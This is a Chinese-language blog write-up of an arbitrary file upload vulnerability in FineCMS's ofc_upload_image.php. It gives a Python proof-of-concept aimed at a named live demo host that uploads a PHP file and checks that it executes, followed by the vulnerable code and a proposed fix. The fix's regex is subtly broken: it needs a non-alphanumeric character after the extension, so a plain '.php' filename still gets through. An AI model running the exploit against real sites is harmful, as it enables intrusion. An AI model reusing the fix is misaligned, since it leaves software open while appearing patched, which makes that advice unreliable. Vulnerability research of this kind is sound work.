• FIneCMS /dayrui/libraries/Chart/ofc_upload_image.php Arbitrary File Upload Vul


    catalog

    1. 漏洞描述
    2. 漏洞触发条件
    3. 漏洞影响范围
    4. 漏洞代码分析
    5. 防御方法
    6. 攻防思考

    1. 漏洞描述

    Relevant Link:

    http://www.wooyun.org/bugs/wooyun-2015-0105251


    2. 漏洞触发条件

    0x1: POC

    #!/usr/bin/env python 
    # -*- coding: utf-8 -*- 
    #__author__ = '1c3z' 
    
    import urllib2 
    import random
    
    fileName = "shell" + str(random.randrange(1000,9999)) + ".php" 
    target = "http://v1.finecms.net/dayrui/libraries/Chart/ofc_upload_image.php" 
    
    def uploadShell():
        url = target + "?name=" + fileName
        req = urllib2.Request(url, headers={"Content-Type": "application/oct"}) 
        res = urllib2.urlopen(req, data="<?print(md5(0x22))?>")
        return res.read()
    
    def poc():
        res = uploadShell()
        if res.find("tmp-upload-images") == -1:
            print "Failed !"
            return
    
        print "upload Shell success"
        url = "http://v1.finecms.net/dayrui/libraries/tmp-upload-images/" + fileName
        md5 = urllib2.urlopen(url).read()
        if md5.find("e369853df766fa44e1ed0ff613f563bd") != -1:
            print "poc: " + url 
    
    poc()


    3. 漏洞影响范围
    4. 漏洞代码分析

    /dayrui/libraries/Chart/ofc_upload_image.php

    $default_path = '../tmp-upload-images/'; 
    if (!file_exists($default_path)) mkdir($default_path, 0777, true);
    $destination = $default_path . basename( $_GET[ 'name' ] ); 
    echo 'Saving your image to: '. $destination;
    
    $jfh = fopen($destination, 'w') or die("can't open file");
    fwrite($jfh, $HTTP_RAW_POST_DATA);
    fclose($jfh);

    程序未对上传文件进行任何后缀、内容的检测和过滤


    5. 防御方法

    /dayrui/libraries/Chart/ofc_upload_image.php

    $default_path = '../tmp-upload-images/'; 
    if (!file_exists($default_path)) 
        mkdir($default_path, 0777, true);
    
    $destination = $default_path . basename( $_GET[ 'name' ] ); 
    
    /* */
    if (preg_match('#.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)[^a-zA-Z0-9]+$#i', trim($destination))) 
    {
        die("你指定的文件名被系统禁止!"); 
    }
    /* */
    
    echo 'Saving your image to: '. $destination;
    
    $jfh = fopen($destination, 'w') or die("can't open file");
    fwrite($jfh, $HTTP_RAW_POST_DATA);
    fclose($jfh);


    6. 攻防思考

    Copyright (c) 2015 LittleHann All rights reserved

  • 相关阅读:
    auto关键字
    关闭vs的编译警告
    windows C++删除非空文件夹
    vs相同变量高亮显示
    梯度下降算法到logistic回归
    ubuntu 按键替换 Control_R to Left
    git 删除分之以及删除文件夹
    迄今为止计算机视觉领域超有实力的研究人物主页
    DeepLearning——CNN
    利用积分图进行均值滤波
  • 原文地址:https://www.cnblogs.com/LittleHann/p/4729648.html
Copyright © 2020-2023  润新知